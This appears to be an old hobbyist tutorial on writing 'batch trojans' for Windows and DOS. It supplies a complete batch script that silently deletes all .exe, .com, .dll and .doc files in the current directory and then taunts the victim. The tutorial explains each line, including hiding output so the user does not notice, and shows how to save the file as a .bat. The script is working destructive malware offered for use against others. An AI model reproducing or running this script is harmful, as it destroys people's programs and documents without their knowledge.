INTRODUCTION ============ Writing batch trojans is the easiest thing to do and they are able to run just on any PC with Windows or DOS. Batch files are basically just unformatted text files with the extension .bat that use DOS commands such as DEL, COPY, FORMAT, ECHO, MKDIR and so on. Batch trojans are Batch files that use destructive commands that can delete other files or Rename them, display messages, Make directories, and Create other files. WRITING BATCH TROJANS ===================== To write a batch trojan, run notepad or some other word processor and type this as follows: @Echo off Del *.exe Del *.com Del *.dll Del *.doc Echo Your Screwed ! Mkdir C:\Screwed! after typed that, click on File then click on Save, Make sure the part where it says "Save as type:" is on "All Files (*.*)" and then in the "File name:" section type "Example.bat" Now your wandering what does that do ! Here it is again with a explanation: @Echo off - Turns echo off so user doesn't know what happens Del *.exe - Deletes all files in the current directory with the .exe extension Del *.com - Deletes all files in the current directory with the .com extension Del *.dll - Deletes all files in the current directory with the .dll extension Del *.doc - Deletes all files in the current directory with the .doc extension Echo Your Screwed ! - Displays Your Screwed ! Mkdir C:\Screwed! - Creates the directory Screwed on the C: drive There is a bunch more commands you can use and they can be found in a MS-DOS manual or in the DOS prompt by typing "Help" if your in MS-DOS 6.0 or lower. Scimming through the MS-DOS manual can help you learn more commands !